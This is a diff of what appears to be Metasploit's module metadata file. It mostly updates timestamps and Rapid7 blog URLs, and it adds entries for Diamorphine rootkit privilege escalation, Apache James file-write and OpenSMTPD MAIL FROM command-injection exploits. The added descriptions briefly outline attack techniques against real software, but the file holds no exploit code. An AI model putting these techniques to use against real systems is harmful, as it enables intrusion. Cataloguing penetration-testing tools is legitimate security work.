@@ -55525,7 +55360,7 @@
     "targets": [
       "Mutiny 5.0-1.07 Appliance (Linux)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/mutiny_frontend_upload.rb",
     "is_install_path": true,
     "ref_name": "linux/http/mutiny_frontend_upload",
@@ -57459,7 +57294,7 @@
     "description": "This module exploits a buffer overflow on the Supermicro Onboard IPMI controller web\n        interface. The vulnerability exists on the close_window.cgi CGI application, and is due\n        to the insecure usage of strcpy. In order to get a session, the module will execute\n        system() from libc with an arbitrary CMD payload sent on the User-Agent header. This\n        module has been tested successfully on Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        SMT_X9_214.",
     "references": [
       "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -57482,7 +57317,7 @@
     "targets": [
       "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/http/smt_ipmi_close_window_bof",
@@ -58993,7 +58828,7 @@
       "Automatic (Unix In-Memory)",
       "Automatic (Linux Dropper)"
     ],
-    "mod_time": "2020-01-16 14:46:00 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
     "is_install_path": true,
     "ref_name": "linux/http/webmin_backdoor",
@@ -59349,7 +59184,7 @@
     "targets": [
       "Automatic Targeting"
     ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
     "path": "/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/http/zenoss_showdaemonxmlconfig_exec",
@@ -60268,6 +60103,52 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/local/diamorphine_rootkit_signal_priv_esc": {
+    "name": "Diamorphine Rootkit Signal Privilege Escalation",
+    "fullname": "exploit/linux/local/diamorphine_rootkit_signal_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2013-11-07",
+    "type": "exploit",
+    "author": [
+      "m0nad",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses Diamorphine rootkit's privesc feature using signal\n        64 to elevate the privileges of arbitrary processes to UID 0 (root).\n\n        This module has been tested successfully with Diamorphine from `master`\n        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).",
+    "references": [
+      "URL-https://github.com/m0nad/Diamorphine"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2020-02-16 14:53:16 +0000",
+    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_linux/local/docker_daemon_privilege_escalation": {
     "name": "Docker Daemon Privilege Escalation",
     "fullname": "exploit/linux/local/docker_daemon_privilege_escalation",
@@ -60340,7 +60221,7 @@
     "targets": [
       "Exim 4.87 - 4.91"
     ],
-    "mod_time": "2019-07-18 10:45:44 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
     "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -61007,7 +60888,7 @@
     "targets": [
       "Micro Focus (HPE) Data Protector <= 10.40 build 118"
     ],
-    "mod_time": "2019-11-03 00:33:24 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
     "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -61922,7 +61803,7 @@
       "BID-61966",
       "URL-http://blog.cmpxchg8b.com/2013/08/security-debianisms.html",
       "URL-http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/05/cve-2013-1662-vmware-mount-exploit"
+      "URL-https://blog.rapid7.com/2013/09/05/cve-2013-1662-vmware-mount-exploit"
     ],
     "platform": "Linux",
     "arch": "x86",
@@ -61936,7 +61817,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2018-10-10 14:35:34 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/local/vmware_mount.rb",
     "is_install_path": true,
     "ref_name": "linux/local/vmware_mount",
@@ -62258,7 +62139,7 @@
     "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
     "references": [
       "CVE-2014-4880",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://blog.rapid7.com/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
     ],
     "platform": "Linux",
     "arch": "armle",
@@ -62273,7 +62154,7 @@
       "DS-7204 Firmware V2.2.10 build 131009",
       "Debug Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -63861,6 +63742,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_linux/smtp/apache_james_exec": {
+    "name": "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
+    "fullname": "exploit/linux/smtp/apache_james_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2015-10-01",
+    "type": "exploit",
+    "author": [
+      "Palaczynski Jakub",
+      "Matthew Aberegg",
+      "Michael Burkey"
+    ],
+    "description": "This module exploits a vulnerability that exists due to a lack of input\n        validation when creating a user. Messages for a given user are stored\n        in a directory partially defined by the username. By creating a user\n        with a directory traversal payload as the username, commands can be\n        written to a given directory. To use this module with the cron\n        exploitation method, run the exploit using the given payload, host, and\n        port. After running the exploit, the payload will be executed within 60\n        seconds. Due to differences in how cron may run in certain Linux\n        operating systems such as Ubuntu, it may be preferable to set the\n        target to Bash Completion as the cron method may not work. If the target\n        is set to Bash completion, start a listener using the given payload,\n        host, and port before running the exploit. After running the exploit,\n        the payload will be executed when a user logs into the system. For this\n        exploitation method, bash completion must be enabled to gain code\n        execution. This exploitation method will leave an Apache James mail\n        object artifact in the /etc/bash_completion.d directory and the\n        malicious user account.",
+    "references": [
+      "CVE-2015-7611",
+      "EDB-35513",
+      "URL-https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Bash Completion",
+      "Cron"
+    ],
+    "mod_time": "2020-02-19 18:57:08 +0000",
+    "path": "/modules/exploits/linux/smtp/apache_james_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/smtp/apache_james_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_linux/smtp/exim4_dovecot_exec": {
     "name": "Exim and Dovecot Insecure Configuration Command Injection",
     "fullname": "exploit/linux/smtp/exim4_dovecot_exec",
@@ -64189,7 +64114,7 @@
     "references": [
       "CVE-2016-1560",
       "CVE-2016-1561",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
+      "URL-https://blog.rapid7.com/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -64203,7 +64128,7 @@
     "targets": [
       "Universal"
     ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
     "is_install_path": true,
     "ref_name": "linux/ssh/exagrid_known_privkey",
@@ -64231,7 +64156,7 @@
       "URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
       "CVE-2012-1493",
       "OSVDB-82780",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
+      "URL-https://blog.rapid7.com/2012/06/25/press-f5-for-root-shell"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -64245,7 +64170,7 @@
     "targets": [
       "Universal"
     ],
-    "mod_time": "2018-08-15 21:27:40 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
     "is_install_path": true,
     "ref_name": "linux/ssh/f5_bigip_known_privkey",
@@ -64674,7 +64599,7 @@
       "Unix In-Memory",
       "Linux Dropper"
     ],
-    "mod_time": "2019-04-24 11:39:34 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
     "is_install_path": true,
     "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -64848,7 +64773,7 @@
       "CVE-2013-0230",
       "OSVDB-89624",
       "BID-57608",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
     ],
     "platform": "Linux",
     "arch": "x86, mipsbe",
@@ -64872,7 +64797,7 @@
       "Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
       "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
     "is_install_path": true,
     "ref_name": "linux/upnp/miniupnpd_soap_bof",
@@ -65441,7 +65366,7 @@
       "CVE-2014-8636",
       "CVE-2015-0802",
       "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=1120261",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
+      "URL-https://blog.rapid7.com/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636"
     ],
     "platform": "",
     "arch": "",
@@ -65456,7 +65381,7 @@
       "Universal (Javascript XPCOM Shell)",
       "Native Payload"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/firefox_proxy_prototype.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/firefox_proxy_prototype",
@@ -65749,7 +65674,7 @@
       "URL-http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx",
       "URL-http://schierlm.users.sourceforge.net/TypeConfusion.html",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/29/cve-2012-0507--java-strikes-again"
+      "URL-https://blog.rapid7.com/2012/03/29/cve-2012-0507--java-strikes-again"
     ],
     "platform": "Java,Linux,OSX,Solaris,Windows",
     "arch": "",
@@ -65767,7 +65692,7 @@
       "Mac OS X x86 (Native Payload)",
       "Linux x86 (Native Payload)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/java_atomicreferencearray.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/java_atomicreferencearray",
@@ -65944,7 +65869,7 @@
       "URL-http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/",
       "URL-http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html",
       "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day",
+      "URL-https://blog.rapid7.com/2012/08/27/lets-start-the-week-with-a-new-java-0day",
       "URL-https://bugzilla.redhat.com/show_bug.cgi?id=852051"
     ],
     "platform": "Java,Linux,Windows",
@@ -65961,7 +65886,7 @@
       "Windows Universal",
       "Linux x86"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/browser/java_jre17_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/browser/java_jre17_exec",
@@ -67456,7 +67381,7 @@
     "references": [
       "CVE-2016-5641",
       "URL-http://github.com/swagger-api/swagger-codegen",
-      "URL-https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
+      "URL-https://blog.rapid7.com/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641"
     ],
     "platform": "Java,NodeJS,PHP,Ruby",
     "arch": "nodejs, php, java, ruby",
@@ -67473,7 +67398,7 @@
       "Java JSP",
       "Ruby"
     ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/fileformat/swagger_param_inject.rb",
     "is_install_path": true,
     "ref_name": "multi/fileformat/swagger_param_inject",
@@ -69439,7 +69364,7 @@
     "references": [
       "URL-http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/",
       "URL-https://github.com/rapid7/metasploit-framework/pull/2461",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module"
+      "URL-https://blog.rapid7.com/2013/10/03/gestioip-authenticated-remote-command-execution-module"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -69462,7 +69387,7 @@
     "targets": [
       "Automatic GestioIP 3.0"
     ],
-    "mod_time": "2018-08-09 23:34:03 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/gestioip_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/gestioip_exec",
@@ -69537,7 +69462,7 @@
     "description": "This module exploits CVE-2014-9390, which affects Git (versions less\n        than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n        less than 3.2.3) and describes three vulnerabilities.\n\n        On operating systems which have case-insensitive file systems, like\n        Windows and OS X, Git clients can be convinced to retrieve and\n        overwrite sensitive configuration files in the .git\n        directory which can allow arbitrary code execution if a vulnerable\n        client can be convinced to perform certain actions (for example,\n        a checkout) against a malicious Git repository.\n\n        A second vulnerability with similar characteristics also exists in both\n        Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n        certain Unicode codepoints are ignorable.\n\n        The third vulnerability with similar characteristics only affects\n        Mercurial clients on Windows, where Windows \"short names\"\n        (MS-DOS-compatible 8.3 format) are supported.\n\n        Today this module only truly supports the first vulnerability (Git\n        clients on case-insensitive file systems) but has the functionality to\n        support the remaining two with a little work.",
     "references": [
       "CVE-2014-9390",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
+      "URL-https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial",
       "URL-http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html",
       "URL-http://article.gmane.org/gmane.linux.kernel/1853266",
       "URL-https://github.com/blog/1938-vulnerability-announced-update-your-git-clients",
@@ -69559,7 +69484,7 @@
       "Automatic",
       "Windows Powershell"
     ],
-    "mod_time": "2018-10-18 11:24:54 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/git_client_command_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/git_client_command_exec",
@@ -70344,7 +70269,7 @@
     "description": "ISPConfig allows an authenticated administrator to export language settings into a PHP script\n      which is intended to be reuploaded later to restore language settings. This feature\n      can be abused to run aribitrary PHP code remotely on the ISPConfig server.\n\n      This module was tested against version 3.0.5.2.",
     "references": [
       "CVE-2013-3629",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -70367,7 +70292,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/ispconfig_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/ispconfig_php_exec",
@@ -70708,7 +70633,7 @@
       "Unix In-Memory",
       "Java Dropper"
     ],
-    "mod_time": "2019-05-30 00:06:10 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
     "is_install_path": true,
     "ref_name": "multi/http/jenkins_metaprogramming",
@@ -71706,7 +71631,7 @@
     "description": "This module exploits the Web UI for Metasploit Community, Express and\n        Pro where one of a certain set of Weekly Releases have been applied.\n        These Weekly Releases introduced a static secret_key_base value.\n        Knowledge of the static secret_key_base value allows for\n        deserialization of a crafted Ruby Object, achieving code execution.\n\n        This module is based on\n        exploits/multi/http/rails_secret_deserialization",
     "references": [
       "OVE-20160904-0002",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
+      "URL-https://blog.rapid7.com/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
       "URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
     ],
     "platform": "Ruby",
@@ -71730,7 +71655,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
     "is_install_path": true,
     "ref_name": "multi/http/metasploit_static_secret_key_base",
@@ -71959,7 +71884,7 @@
     "references": [
       "CVE-2013-3630",
       "EDB-28174",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -71982,7 +71907,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-05-10 14:02:01 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/moodle_cmd_exec",
@@ -72116,7 +72041,7 @@
     "description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n      the code executed remotely. This module was successfully tested against NAS4Free version\n      9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
     "references": [
       "CVE-2013-3631",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -72139,7 +72064,7 @@
     "targets": [
       "Automatic Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/nas4free_php_exec",
@@ -72698,7 +72623,7 @@
     "description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n      An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
     "references": [
       "CVE-2013-3632",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -72721,7 +72646,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-08-28 20:17:58 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/openmediavault_cmd_exec",
@@ -74805,7 +74730,7 @@
     "references": [
       "CVE-2013-0156",
       "OSVDB-89026",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
     ],
     "platform": "Ruby",
     "arch": "ruby",
@@ -74828,7 +74753,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/rails_xml_yaml_code_exec",
@@ -77360,7 +77285,7 @@
     "description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n      Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n      script and execute arbitrary PHP code remotely.\n\n      This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
     "references": [
       "CVE-2013-3591",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -77383,7 +77308,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-08 10:04:47 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/vtiger_php_exec",
@@ -77919,7 +77844,7 @@
     "description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n      An authenticated attacker can create a script containing a payload, then a host\n      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n      This module was tested against Zabbix v2.0.9.",
     "references": [
       "CVE-2013-3628",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
     ],
     "platform": "Linux,Unix",
     "arch": "cmd",
@@ -77942,7 +77867,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-07 21:18:50 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
     "is_install_path": true,
     "ref_name": "multi/http/zabbix_script_exec",
@@ -80875,7 +80800,7 @@
       "Linux",
       "Mac OS X"
     ],
-    "mod_time": "2020-01-09 15:02:04 +0000",
+    "mod_time": "2020-02-19 09:32:34 +0000",
     "path": "/modules/exploits/multi/script/web_delivery.rb",
     "is_install_path": true,
     "ref_name": "multi/script/web_delivery",
@@ -81011,7 +80936,7 @@
       "CVE-2012-5958",
       "OSVDB-89611",
       "US-CERT-VU-922681",
-      "URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
+      "URL-https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
     ],
     "platform": "Unix",
     "arch": "cmd",
@@ -81028,7 +80953,7 @@
       "Axis Camera M1011 5.20.1 UPnP/1.4.1",
       "Debug Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
     "is_install_path": true,
     "ref_name": "multi/upnp/libupnp_ssdp_overflow",
@@ -81439,7 +81364,7 @@
     "targets": [
       "Mac OS X"
     ],
-    "mod_time": "2019-02-09 18:46:35 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
     "path": "/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb",
     "is_install_path": true,
     "ref_name": "osx/browser/adobe_flash_delete_range_tl_op",
@@ -84786,7 +84711,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
+    "description": "This module exploits a SUID installation of the Emacs movemail utility\n        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n\n        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Movemail",
       "URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
@@ -84807,7 +84732,7 @@
     "targets": [
       "/usr/lib/crontab.local"
     ],
-    "mod_time": "2018-12-03 12:22:40 +0000",
+    "mod_time": "2020-02-05 17:21:47 +0000",
     "path": "/modules/exploits/unix/local/emacs_movemail.rb",
     "is_install_path": true,
     "ref_name": "unix/local/emacs_movemail",
@@ -85317,7 +85242,7 @@
       "Cliff Stoll",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
+    "description": "This module exploits sendmail's well-known historical debug mode to\n        escape to a shell and execute commands in the SMTP RCPT TO command.\n\n        This vulnerability was exploited by the Morris worm in 1988-11-02.\n        Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n        Currently, only cmd/unix/reverse and cmd/unix/generic are supported.",
     "references": [
       "URL-https://en.wikipedia.org/wiki/Morris_worm",
       "URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
@@ -85336,7 +85261,7 @@
     "targets": [
       "@(#)version.c       5.51 (Berkeley) 5/2/86"
     ],
-    "mod_time": "2019-12-23 19:02:13 +0000",
+    "mod_time": "2020-02-05 19:13:19 +0000",
     "path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
     "is_install_path": true,
     "ref_name": "unix/smtp/morris_sendmail_debug",
@@ -85347,6 +85272,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/smtp/opensmtpd_mail_from_rce": {
+    "name": "OpenSMTPD MAIL FROM Remote Code Execution",
+    "fullname": "exploit/unix/smtp/opensmtpd_mail_from_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-01-28",
+    "type": "exploit",
+    "author": [
+      "Qualys",
+      "wvu <wvu@metasploit.com>",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "This module exploits a command injection in the MAIL FROM field during\n        SMTP interaction with OpenSMTPD to execute a command as the root user.",
+    "references": [
+      "CVE-2020-7247",
+      "URL-https://seclists.org/oss-sec/2020/q1/40"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 25,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "OpenSMTPD >= commit a8e222352f"
+    ],
+    "mod_time": "2020-03-02 14:15:52 +0000",
+    "path": "/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/smtp/opensmtpd_mail_from_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/smtp/qmail_bash_env_exec": {
     "name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
     "fullname": "exploit/unix/smtp/qmail_bash_env_exec",
@@ -86509,7 +86485,7 @@
       "Drupal 8.x (Unix In-Memory)",
       "Drupal 8.x (Linux Dropper)"
     ],
-    "mod_time": "2019-03-05 18:58:11 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
     "path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/drupal_drupalgeddon2",
@@ -86619,7 +86595,7 @@
       "PHP In-Memory",
       "Unix In-Memory"
     ],
-    "mod_time": "2019-04-24 11:41:30 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
